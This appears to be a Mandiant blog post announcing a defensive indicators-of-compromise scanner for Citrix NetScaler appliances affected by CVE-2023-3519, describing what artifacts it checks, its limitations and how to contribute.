Indicators of Compromise Scanner for Citrix ADC Zero-Day (CVE-2023-3519)
Mandiant recently published a blog post about the compromise of Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway Appliances related to the zero-day vulnerability tracked as CVE-2023-3519. CVE-2023-3519 is a zero-day vulnerability that can enable remote code execution, and has been observed being exploited in the wild by a threat actor consistent with a China-nexus based on known capabilities and history of targeting Citrix ADCs. Recently, proof-of-concepts to exploit this vulnerability have been publicly posted.
Today we are releasing a tool to help organizations scan their Citrix appliances for evidence of post-exploitation activity related to CVE-2023-3519. The tool contains indicators of compromise (IOCs) collected during Mandiant investigations and sourced from our partners and the community. Head over to the Mandiant GitHub page to download the tool today to scan your appliances.
The tool is designed to do a best effort job at identifying existing compromises. It will not identify a compromise 100% of the time, and it will not tell you if a device is vulnerable to exploitation. Keep in mind that applying the upgrade from Citrix will not remove any malware that may have been placed on the appliance. Mandiant recommends that organizations run the scanner on all appliances that were vulnerable and exposed to the Internet for any period of time.
The scanning tool is designed to be run on a live appliance or a mounted forensic image. This scanner will search across a number of sources on the appliance to look for evidence of post-exploitation activity:
- File system paths that are likely to be malware
- Attacker or suspicious commands in the shell history
- Files in NetScaler directories with contents matching known IOCs
- Files with suspicious permissions or ownership
- Suspicious crontab entries
- Suspicious running processes
The IOC Scanner for CVE-2023-3519 was developed by Mandiant in collaboration with Citrix. It is based on knowledge gleaned from incident response engagements related to exploitation of CVE-2023-3519. The goal of the scanner is to analyze available log sources and system forensic artifacts to identify evidence of successful exploitation of CVE-2023-3519.
There are limitations in what the tool will be able to accomplish, and therefore, executing the tool should not be considered a guarantee that a system is free of compromise. For example, log files on the system with evidence of compromise may have been truncated or rolled, the system may have been rebooted, an attacker may have tampered with the system to remove evidence of compromise and/or installed a rootkit that masks evidence of compromise.
If indications of compromise are identified on systems, organizations should perform a forensic examination of the compromised system to determine the scope and extent of the incident. Download the standalone Bash script from our GitHub repository and follow the instructions in the README for more details on how to run it against an appliance or forensic image.
This software is provided as-is, without warranty or representation for any use or purpose.
As you invent further ways to identify compromise, please consider contributing to this IOC Scanner. We would like to provide the most thorough, correct scanner as possible.
The primary goal is to report high confidence IOCs. Because users may rely on the output of this tool to initiate further investigation, it's important that we don't send them on a wild goose chase. Any evidence of an actor gaining access to the system, fetching information, or creating content should always be reported. To contribute indicators please send us a pull request or open an issue if you’re not sure of the best way to hunt for your new indicator.
If you identify evidence of compromise on your Citrix ADC and want support with your investigation, feel free to contact Mandiant at firstname.lastname@example.org.
Mandiant thanks Citrix for their support and partnership. Mandiant would like to thank the Shadowserver foundation for their excellent blog post and support. This tool is based on the framework previously developed by Willi Ballenthin and the team for CVE-2019-19781.
Citrix released security bulletin CTX561482 on July 18, describing vulnerabilities in Citrix NetScaler ADC and Citrix NetScaler Gateway. CVE-2023-3519, one of those vulnerabilities, could allow an unauthenticated remote attacker to perform arbitrary code execution.
We hope our IOC Scanner tool helps organizations and the security community identify and defend against attacks related to CVE-2023-3519, and look forward to seeing contributions and feedback.